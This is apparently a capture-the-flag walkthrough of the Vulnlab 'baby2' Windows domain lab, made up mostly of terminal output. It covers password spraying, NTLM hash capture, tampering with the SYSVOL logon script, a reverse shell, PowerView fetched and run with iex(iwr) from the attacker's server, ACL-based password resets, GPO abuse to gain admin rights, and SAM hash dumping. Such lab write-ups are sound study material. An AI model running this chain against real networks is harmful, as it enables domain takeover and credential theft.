2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Amelia.Griffiths@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Carl.Moore@baby2.vl
2024/06/05 10:51:32 >  [!] Joel.Hurst   @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Nicola.Lamb    @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Lynda.Bailey   @baby2.vl - User does not exist
2024/06/05 10:51:33 >  [+] VALID USERNAME:	 Ryan.Jenkins@baby2.vl
2024/06/05 10:51:33 >  Done! Tested 11 usernames (7 valid) in 0.046 seconds

.

 

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'users.txt' -p 'users.txt'  --no-bruteforce --continue-on-success
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\library:library 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 

.

                                                                    
┌──(puck㉿kali)-[~/vulnlab/baby2]
sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

--snip--

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::649e:d175:8068:bcd1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4JOEGPTIY13]
    Responder Domain Name      [VHTD.LOCAL]
    Responder DCE-RPC Port     [45034]

[+] Listening for events...

[SMB] NTLMv1-SSP Client   : 10.10.107.115
[SMB] NTLMv1-SSP Username : BABY2\Amelia.Griffiths
[SMB] NTLMv1-SSP Hash     : Amelia.Griffiths::BABY2:209A2B76B00AD43400000000000000000000000000000000:3396018DE3FBCDC60DDC06D5C83119BA2C907D2EE4041103:fe87a8a485cea873
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths

.

Download login.vbs, modify it to below and then upload it

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ smbclient //baby2.vl/SYSVOL -U Carl.Moore
Password for [WORKGROUP\Carl.Moore]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 19:37:36 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 19:37:36 2023

        6126847 blocks of size 4096. 1960515 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 19:43:55 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 19:43:55 2023
  Policies                            D        0  Tue Aug 22 19:37:41 2023
  scripts                             D        0  Tue Aug 22 21:28:27 2023

        6126847 blocks of size 4096. 1960512 blocks available
smb: \baby2.vl\> cd scripts
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1960216 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1980334 blocks available
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (19.4 kb/s) (average 19.4 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A     1190  Thu Jun  6 10:42:19 2024

        6126847 blocks of size 4096. 1980332 blocks available
smb: \baby2.vl\scripts\>

.

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ bloodhound-python -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.97.10 
INFO: Found AD domain: baby2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.baby2.vl
INFO: Done in 00M 06S

.

Catch the shell

──(puck㉿kali)-[~/vulnlab/baby2]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.121.13 - - [06/Jun/2024 10:42:58] "GET /Invoke-ConPtyShell.ps1 HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.121.13] 54867
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E6F3-2485

 Directory of c:\temp

06/06/2024  01:53 AM    <DIR>          .
06/06/2024  01:53 AM            45,272 nc.exe
               1 File(s)         45,272 bytes
               1 Dir(s)   8,262,537,216 bytes free

c:\temp>powershell                                                     
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> iex (iwr -usebasicparsing http://10.8.2.138:8000/PowerView.ps1)

PS C:\temp> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

PS C:\temp> $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

PS C:\temp> set-domainuserpassword gpoadm -accountpassword $cred

PS C:\temp> 

Check if o.k.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'gpoadm' -p 'Password123!'  --no-bruteforce --continue-on-success 
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\gpoadm:Password123! 
                                                                                
┌──(puck㉿kali)-[~/vulnlab/baby2]

.

Using pyGPOAbuse, we can create an immediate scheduled task which will get executed as SYSTEM user to add gpoadm in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current version of impacket), we’ll need the GPO ID for creating the task

.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ git clone https://github.com/Hackndo/pyGPOAbuse.git Cloning into 'pyGPOAbuse'
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ ls assets LICENSE pygpoabuse pygpoabuse.py README.md requirements.txt venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] 
└─$ pip3 install -r requirements.txt Collecting msldap (from -r requirements.txt (line 1))
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.71.85 -command 'net localgroup administrators /add gpoadm' 
SUCCESS:root:ScheduledTask TASK_60bdad92 created!
[+] ScheduledTask TASK_60bdad92 created!

now we are admin

PS C:\temp> net user gpoadm
net user gpoadm
User name gpoadm
Full Name gpoadm
Comment 
User's comment 
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/6/2024 7:16:03 AM
Password expires Never
Password changeable 6/7/2024 7:16:03 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script 
User profile 
Home directory 
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators 
Global Group memberships *Domain Users 
The command completed successfully.

PS C:\temp>


┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ evil-winrm -i baby2.vl -u 'gpoadm' -p 'Password123!' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gpoadm\Documents> whoami
baby2\gpoadm
*Evil-WinRM* PS C:\Users\gpoadm\Documents>

.

Beyond root

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ impacket-secretsdump baby2.vl/gpoadm:'Password123!'@10.10.74.17

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x34170b414576a40142e3edc4911d859d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator Password123!
The command completed successfully.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla 

 

.

 

c:\windows\system32\tasks\logonsim

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-08-22T12:48:15.1312495</Date>
    <Author>BABY2\Administrator</Author>
    <URI>\logonsim</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <Delay>PT2M</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>\windows\logon.ps1</Arguments>
    </Exec>
  </Actions>
</Task>

c:\windows\login.ps1

cscript //X \\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs

.

 

 

 

 

 

 

 

.